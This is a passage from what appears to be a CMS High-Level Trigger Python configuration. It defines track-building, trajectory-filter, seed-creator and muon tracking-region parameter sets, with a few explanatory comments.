updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMuonCkfTrajectoryBuilder = cms.PSet(
rescaleErrorIfFail = cms.double( 1.0 ),
ComponentType = cms.string( "MuonCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMuonCkfTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( False ),
propagatorProximity = cms.string( "SteppingHelixPropagatorAny" ),
updator = cms.string( "hltESPKFUpdator" ),
deltaEta = cms.double( -1.0 ),
useSeedLayer = cms.bool( False ),
deltaPhi = cms.double( -1.0 ),
seedAs5DHit = cms.bool( False )
)
HLTIter0HighPtTkMuPSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPvClusterComparerForBTag = cms.PSet(
track_chi2_max = cms.double( 20.0 ),
track_pt_max = cms.double( 20.0 ),
track_prob_min = cms.double( -1.0 ),
track_pt_min = cms.double( 0.1 )
)
HLTSeedFromConsecutiveHitsTripletOnlyCreator = cms.PSet(
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
SeedMomentumForBOFF = cms.double( 5.0 ),
propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
forceKinematicWithRegionDirection = cms.bool( False ),
magneticField = cms.string( "ParabolicMf" ),
OriginTransverseErrorMultiplier = cms.double( 1.0 ),
ComponentName = cms.string( "SeedFromConsecutiveHitsTripletOnlyCreator" ),
MinOneOverPtError = cms.double( 1.0 )
)
HLTIter2GroupedCkfTrajectoryBuilderIT = cms.PSet(
keepOriginalIfRebuildFails = cms.bool( False ),
lockHits = cms.bool( True ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter2PSetTrajectoryFilterIT" ) ),
doSeedingRegionRebuilding = cms.bool( False ),
useHitsSplitting = cms.bool( False ),
maxCand = cms.int32( 2 ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
intermediateCleaning = cms.bool( True ),
bestHitOnly = cms.bool( True ),
useSameTrajFilter = cms.bool( True ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
lostHitPenalty = cms.double( 30.0 ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
cleanTrajectoryAfterInOut = cms.bool( False ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( False ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter2PSetTrajectoryFilterIT" ) ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTIter3PSetTrajectoryBuilderIT = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter3ESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter3PSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
maxCand = cms.int32( 1 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTSiStripClusterChargeCutTight = cms.PSet( value = cms.double( 1945.0 ) )
HLTPSetCkf3HitTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( -1 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedStepTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 2 ),
minPt = cms.double( 0.075 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMuonTrackingRegionBuilder8356 = cms.PSet(
Rescale_Dz = cms.double( 3.0 ),
Pt_fixed = cms.bool( False ),
Eta_fixed = cms.bool( False ),
Eta_min = cms.double( 0.1 ),
DeltaZ = cms.double( 15.9 ),
maxRegions = cms.int32( 2 ),
EtaR_UpperLimit_Par1 = cms.double( 0.25 ),
UseVertex = cms.bool( False ),
Z_fixed = cms.bool( True ),
PhiR_UpperLimit_Par1 = cms.double( 0.6 ),
PhiR_UpperLimit_Par2 = cms.double( 0.2 ),
Rescale_phi = cms.double( 3.0 ),
DeltaEta = cms.double( 0.2 ),
precise = cms.bool( True ),
OnDemand = cms.int32( -1 ),
EtaR_UpperLimit_Par2 = cms.double( 0.15 ),
MeasurementTrackerName = cms.InputTag( "hltESPMeasurementTracker" ),
vertexCollection = cms.InputTag( "pixelVertices" ),
Pt_min = cms.double( 1.5 ),
beamSpot = cms.InputTag( "hltOnlineBeamSpot" ),
Phi_fixed = cms.bool( False ),
DeltaR = cms.double( 0.2 ),
input = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),
DeltaPhi = cms.double( 0.2 ),
Phi_min = cms.double( 0.1 ),
Rescale_eta = cms.double( 3.0 )
)
HLTPSetDetachedCkfTrajectoryFilterForHI = cms.PSet(
minimumNumberOfHits = cms.int32( 6 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 0.701 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter3PSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetJetCoreStepTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter2PSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 1 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMuTrackJpsiTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMuTrackJpsiTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
maxCand = cms.int32( 1 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetTrajectoryBuilderForGsfElectrons = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 90.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "hltESPBwdElectronPropagator" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTrajectoryFilterForElectrons" ) ),
propagatorAlong = cms.string( "hltESPFwdElectronPropagator" ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator2000" ),
intermediateCleaning = cms.bool( False ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTSiStripClusterChargeCutNone = cms.PSet( value = cms.double( -1.0 ) )
HLTPSetTobTecStepTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMuonCkfTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( -1 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetbJetRegionalTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 8 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CompositeTrajectoryFilter" ),
filters = cms.VPSet(
cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedStepTrajectoryFilterBase" ) )
)
)
HLTIter1PSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.2 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedCkfTrajectoryFilterForHIGlobalPt8 = cms.PSet(
minimumNumberOfHits = cms.int32( 6 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 8.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 0.701 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMixedStepTrajectoryBuilder = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialForMixedStepOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedStepTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForMixedStep" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeTightMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedStepTrajectoryFilter" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMixedStepTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.05 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetCkfTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( -1 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
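# Illustrative sketch only (hypothetical, not referenced anywhere in this menu):
# these CkfBaseTrajectoryFilter PSets are usually customized by cloning an existing
# one and overriding individual cuts rather than retyping the full parameter list.
# The name "exampleCkfTrajectoryFilterTightPt" is invented for this example.
exampleCkfTrajectoryFilterTightPt = HLTPSetCkfTrajectoryFilter.clone(
    minPt = cms.double( 2.0 ),            # tighten the pT threshold (default above: 0.9)
    minimumNumberOfHits = cms.int32( 6 )  # require one more hit than the default of 5
)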
HLTSeedFromProtoTracks = cms.PSet(
TTRHBuilder = cms.string( "hltESPTTRHBuilderPixelOnly" ),
SeedMomentumForBOFF = cms.double( 5.0 ),
propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
forceKinematicWithRegionDirection = cms.bool( False ),
magneticField = cms.string( "ParabolicMf" ),
OriginTransverseErrorMultiplier = cms.double( 1.0 ),
ComponentName = cms.string( "SeedFromConsecutiveHitsCreator" ),
MinOneOverPtError = cms.double( 1.0 )
)
HLTPSetInitialStepTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 2 ),
minPt = cms.double( 0.2 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter2PSetTrajectoryBuilderIT = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter2ESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter2PSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
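# The iter2 builder above uses the plain CkfTrajectoryBuilder, which extends one
# candidate hit-by-hit and therefore carries none of the rebuild- or grouping-related
# parameters (lockHits, bestHitOnly, minNrOfHitsForRebuild, ...) found in the
# GroupedCkfTrajectoryBuilder PSets elsewhere in this file.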
HLTPSetMuTrackJpsiTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 10.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 8 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTSeedFromConsecutiveHitsCreatorIT = cms.PSet(
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
SeedMomentumForBOFF = cms.double( 5.0 ),
propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
forceKinematicWithRegionDirection = cms.bool( False ),
magneticField = cms.string( "ParabolicMf" ),
OriginTransverseErrorMultiplier = cms.double( 1.0 ),
ComponentName = cms.string( "SeedFromConsecutiveHitsCreator" ),
MinOneOverPtError = cms.double( 1.0 )
)
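# Brief orientation for the SeedFromConsecutiveHitsCreator PSets: ComponentName
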